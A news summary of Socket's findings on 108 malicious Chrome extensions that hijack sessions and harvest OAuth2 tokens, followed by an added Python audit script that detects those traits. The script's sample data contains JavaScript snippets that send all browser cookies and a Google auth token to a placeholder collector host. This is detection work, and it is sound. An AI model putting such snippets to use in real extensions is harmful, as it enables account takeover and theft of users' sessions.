A large-scale campaign involving 108 malicious Chrome extensions has been uncovered, affecting roughly 20,000 users, with the extensions spread across categories such as gaming, social media tools and translation utilities. The extensions appear legitimate but secretly collect sensitive data, and all are linked to a single command-and-control infrastructure to enable operators to aggregate stolen information in one place.
According to Socket, the campaign stands out for its breadth and coordination: the extensions were published under five developer identities, yet all share the same backend systems and operational patterns. Several attack techniques were deployed, including a Telegram-focused extension that captures the user's active web sessions every 15 seconds, giving the operators full account access without needing passwords or MFA.
The research also notes extensions that harvest Google account details via OAuth2, inject ads, or open arbitrary pages through hidden backdoors, many of them running in the background even when the user is not interacting with them. Infosecurity Magazine contacted Google for comment but has not yet received a response. 14 April 2026.
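The traits described above (cookie access across all sites, timed uploads to a collector, OAuth2 token requests, and one backend shared by extensions from different developer identities) can be checked for in unpacked extension code. The following is an added audit example written for this summary, not code from Socket or Infosecurity Magazine; the extension names, developer IDs, hostnames and source snippets are constructed placeholders, not indicators from the campaign.

```python
"""Flag session-theft traits in unpacked Chrome extensions and find backends shared across developers."""
import re
from collections import defaultdict

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
TIMER_RE = re.compile(r"chrome\.alarms\.create|setInterval\s*\(")
UPLOAD_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon")

# Constructed sample: one cookie-stealer on a timer, one OAuth2 harvester, one benign extension.
SAMPLE_EXTENSIONS = [
    {"id": "ext-a", "developer": "dev-1",
     "manifest": {"permissions": ["cookies", "alarms"], "host_permissions": ["<all_urls>"]},
     "source": 'chrome.alarms.create("sync", {periodInMinutes: 0.25});\n'
               'chrome.cookies.getAll({}, c => fetch("https://collector.example.net/up", '
               '{method: "POST", body: JSON.stringify(c)}));'},
    {"id": "ext-b", "developer": "dev-2",
     "manifest": {"permissions": ["identity"]},
     "source": 'chrome.identity.getAuthToken({interactive: true}, '
               't => fetch("https://collector.example.net/tok?t=" + t));'},
    {"id": "ext-c", "developer": "dev-3",
     "manifest": {"permissions": ["storage"]},
     "source": 'fetch("https://api.translate-vendor.example.org/v1");'},
]


def extension_findings(ext):
    """Return the suspicious traits found in one extension's manifest and source."""
    manifest, src = ext["manifest"], ext["source"]
    perms = set(manifest.get("permissions", []))
    # MV3 puts host patterns in host_permissions; MV2 mixed them into permissions.
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    findings = []
    if "cookies" in perms and hosts & BROAD_HOSTS:
        findings.append("cookie access across all sites")
    if TIMER_RE.search(src) and UPLOAD_RE.search(src):
        findings.append("timer-driven network upload")
    if "identity" in perms and "getAuthToken" in src:
        findings.append("requests Google OAuth2 token")
    return findings


def shared_backends(extensions):
    """Map each external host to the developers whose extensions contact it, keeping only
    hosts reached from more than one developer identity (the coordination signal)."""
    devs_by_host = defaultdict(set)
    for ext in extensions:
        for host in HOST_RE.findall(ext["source"]):
            devs_by_host[host.lower()].add(ext["developer"])
    return {h: d for h, d in devs_by_host.items() if len(d) > 1}


if __name__ == "__main__":
    for ext in SAMPLE_EXTENSIONS:
        print(ext["id"], extension_findings(ext))
    print("shared backends:", shared_backends(SAMPLE_EXTENSIONS))
```

On a real review the manifest and source strings would come from the unpacked extension directory; a host contacted by extensions from several unrelated developers is worth checking against the rest of the fleet.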